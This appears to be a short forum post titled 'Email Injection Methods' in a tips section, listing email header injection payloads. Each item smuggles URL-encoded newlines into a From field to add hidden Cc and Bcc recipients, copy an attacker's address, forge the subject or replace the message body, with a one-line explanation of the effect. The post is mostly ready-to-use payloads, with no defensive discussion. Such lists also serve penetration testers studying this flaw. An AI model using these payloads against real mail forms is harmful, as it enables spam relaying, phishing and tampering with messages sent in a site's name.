Home Forums Tips And Tricks Email Injection Methods

  • Email Injection Methods

    Posted by Mynk0x00  on April 22, 2024 at 10:59 am

    ## Inject in sent e-mail

    Inject Cc and Bcc after sender argument

    From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

    The message will be sent to the recipient and recipient1 accounts.

    ## Inject argument

    From:sender@domain.com%0ATo:attacker@domain.com

    The message will be sent to the original recipient and the attacker account.

    ## Inject Subject argument

    From:sender@domain.com%0ASubject:This is%20Fake%20Subject

    The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.

    ## Change the body of the message

    Inject a two-line feed, then write your message to change the body of the message.

    From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.

    Mynk0x00  replied 6 months ago 1 Member · 0 Replies
  • 0 Replies

Sorry, there were no replies found.

Reply to: Mynk0x00
## Inject in sent e-mail Inject Cc and Bcc after …
Cancel
Your information:

Start of Discussion
0 of 0 replies June 2018
Now